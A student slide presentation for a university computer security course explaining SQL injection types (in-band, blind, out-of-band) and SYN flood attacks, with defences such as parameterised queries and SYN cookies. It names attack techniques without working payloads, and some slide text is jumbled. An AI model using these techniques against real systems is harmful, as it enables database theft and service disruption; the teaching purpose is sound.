Slide 1

Bahir Dar UniversityBahir Dar institute of technology

Faculty of computingDepartment of computer science 4th year Section B

Computer Security Assignment Presentation  

 

 BY:-Tesfahunegn Minwuyelet    

  S

Date of Submission: 09/11/2016 GC.

Slide 2

SQL injection and SYN AttackContents

SQL injection Types of SQL injection (SQLi)Parameters to protection SYN Attack SYN flood defence categories10 Hacks that made headlines

Slide 3

SQL Injection is a technique where malicious users can inject SQL commands

into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and

compromise the security of a web application. is a code injection technique, used to attack data-driven

applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

consists of insertion or "injection" of a SQL query via the input data from the client to the application.

The risk of SQL injection exploits is on the rise because of automated tools. In the past, the danger was somewhat limited because an exploit had to be carried out manually: an attacker had to actually type their SQL statement into a text box.

Slide 4

Types of SQL injection SQL Injection can be used in a range of ways to cause

serious problems. By levering SQL Injection, an attacker could bypass authentication, access, modify and delete data within a database. In some cases, SQL Injection can even be used to execute commands on the operating system, potentially allowing an attacker to escalate to more damaging attacks inside of a network that sits behind a firewall.

There are three types of SQLI In-band SQLi(Classic SQLI) Inferential SQLI Out-of –band SQLI

Slide 5

In-band sqli(classic sql) is the most common and easy-to-exploit of SQL

Injection attacks. it occurs when an attacker is able to use the

same communication channel to both launch the attack and gather results.

The two most common types of in-band SQL Injection are Error-based SQLi Union-based SQLi

Slide 6

Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database.

In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database.

While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead.

Slide 7

Union-based SQLi Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response

Slide 8

Inferential sqli (Blind sqli) unlike in-band SQLi, may take longer for an

attacker to exploit, however, it is just as dangerous as any other form of SQL Injection

commonly referred to as “blind SQ , no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band L Injection attacks” because

The two types of inferential SQL Injection are Blind-boolean-based SQLi Blind-time-based SQLi.

Slide 9

Blind-boolean-based SQLi technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

even though no data from the database is returned.

This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database, character by character.

Slide 10

Blind-time-based SQLi that relies on sending an SQL query to the

database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

even though no data from the database is returned.

This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

Slide 11

Out-of-band SQLi is not very common, mostly because it depends on

features being enabled on the database server being used by the web application

It occurs when an attacker is unable to use the same channel to launch the attack and gather results.

would rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker

Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.

Slide 12

SQL Injection Based on 1=1 is Always True SQL Injection Based on ""="" is Always True SQL Injection Based on Batched SQL Statements  Parameters for protection Some web developers use a "blacklist" of words or characters to

search for in SQL input, to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input. (In fact, it should be perfectly legal to input an SQL statement in a database field.) The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters. SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.

Slide 13

SYN Attack A SYN flood is a form of denial-of-service attack in

which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.

A SYN attack is a type of denial-of-service (DoS) attack in which an attacker utilizes the communication protocol of the Internet

For each SYN packet received, the target machine allocates resources and sends an acknowledgement (SYN-ACK) to the source IP address.

Because the target machine doesn't receive a response from the attacking machine, it attempts to resend the SYN-ACK five times, at 3-, 6-, 12-, 24-, and 48-second intervals, before un allocating the resources 96 seconds after attempting the last retry

Slide 14

Continue… The SYN flood attack is the most common type of

flooding attack. The attack occurs when the attacker sends large number of SYN packets to the victim, forcing them to wait for replies that never come. The third part of the TCP three-way handshake is not executed

The source address of these SYN packets in a SYN flood attack is typically set to an unreachable host. As a result, it is impossible to find the attacking computer.

Slide 15

SYN flood defense categories Firewall based

• Examples: SYN Defender, SYN proxying• Filters packets and requests before router• Maintains state for each connection• Drawbacks: can be overloaded, extra delay for processing each packet

Slide 16

Continue… Server Based

• Examples: SYN Cache, SYN cookies• SYN cache receives packets first and then uses a hash table, to partially store states, • Removes the need to watch half open connections• Implemented in LINUX

Slide 17

Continue… SYN kill

SYN kill monitors the network and if it detects SYNs that are not being acknowledge.

It automatically generates RST packets to free

It automatically generates RST packets to free resources,

It classifies addresses as likely to be spoofed or legitimate…

Slide 18

Continue… MULTOPS

Monitors the packets going to and from a victim

Blocks IPs from outside of network… limiting IP range of attack.

Slide 19

Continue… Route-based Distributed Packet filtering

Uses packet information to determine if packet arriving at router has a spoofed Source /Destination addresses

Results show many packets can be filtered and those that can’t can be traced back easily

Slide 20

10 HACKS THAT MADE HEADLINES Markus Hess hacks on behalf of the KGB Robert Morris hacks the internet Vladimir Levin hacks Citibank Jonathon James hacks NASA Adrian Lamo hacks the New York Times Gary McKinnon hacks the US military Albert Gonzalez hacks TJX (and many more) Anonymous hacks HB Gary Lulzsec hacks Sony News of the World hacking scandal

Microsoft Word Document

Slide 21

Thanks!!